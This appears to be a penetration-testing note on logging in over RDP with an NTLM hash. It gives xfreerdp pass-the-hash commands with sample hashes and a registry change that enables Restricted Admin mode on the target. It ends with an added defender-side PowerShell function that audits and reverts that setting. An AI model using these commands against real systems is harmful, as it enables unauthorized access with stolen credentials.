RDP login with NTLM Hash

Logging in over RDP with an NTLM hash is possible, provided the target's RDP port is reachable from our Parrot attacking machine. If we have a valid NTLM hash for a user (usually an administrator), we can use that hash to log in over RDP with xfreerdp:

xfreerdp /u:admin /pth:2892d26cdf84d7a70e2eb3b9f05c425e /v: /cert-ignore

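Enable RDP pass-the-hash on the target machine (for example purposes). Setting DisableRestrictedAdmin to 0 turns on Restricted Admin mode, which is what allows a hash-based RDP logon: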

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Then pass the hash over RDP to the target machine:

proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore
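
A defender-side check for the registry setting used above, as an added example that is not part of the original page: it reports whether Restricted Admin mode and RDP are enabled on the local host and can set DisableRestrictedAdmin back to 1. The function name and the -Remediate switch are hypothetical.

```powershell
# Added example: audit the Restricted Admin setting that makes hash-based RDP logon possible.
function Test-RestrictedAdminRdp {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [switch]$Remediate   # hypothetical switch: write DisableRestrictedAdmin = 1
    )

    $lsaPath = 'HKLM:\System\CurrentControlSet\Control\Lsa'
    $lsaName = 'DisableRestrictedAdmin'
    $tsPath  = 'HKLM:\System\CurrentControlSet\Control\Terminal Server'
    $tsName  = 'fDenyTSConnections'

    # Read both values; a missing value comes back as $null instead of an error.
    $lsa = Get-ItemProperty -Path $lsaPath -Name $lsaName -ErrorAction SilentlyContinue
    $ts  = Get-ItemProperty -Path $tsPath  -Name $tsName  -ErrorAction SilentlyContinue
    $lsaValue = if ($null -ne $lsa) { $lsa.$lsaName } else { $null }
    $tsValue  = if ($null -ne $ts)  { $ts.$tsName }  else { $null }

    # 0 means Restricted Admin mode is accepted, so an NTLM hash is enough to log on.
    $restrictedAdmin = ($null -ne $lsaValue -and $lsaValue -eq 0)
    # fDenyTSConnections = 0 means the host accepts RDP connections at all.
    $rdpEnabled = ($null -ne $tsValue -and $tsValue -eq 0)

    if ($restrictedAdmin -and $Remediate -and
        $PSCmdlet.ShouldProcess("$lsaPath\$lsaName", 'Set to 1')) {
        Set-ItemProperty -Path $lsaPath -Name $lsaName -Value 1 -Type DWord
        $lsaValue = 1
        $restrictedAdmin = $false
    }

    [pscustomobject]@{
        ComputerName           = $env:COMPUTERNAME
        DisableRestrictedAdmin = if ($null -eq $lsaValue) { '(not set)' } else { $lsaValue }
        RestrictedAdminEnabled = $restrictedAdmin
        RdpEnabled             = $rdpEnabled
        ExposedToRdpPassTheHash = ($restrictedAdmin -and $rdpEnabled)
    }
}

# Report only; add -Remediate (from an elevated session) to revert the setting.
Test-RestrictedAdminRdp
```

The same function can be run across a fleet with Invoke-Command to find hosts where the value was left at 0 after testing.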
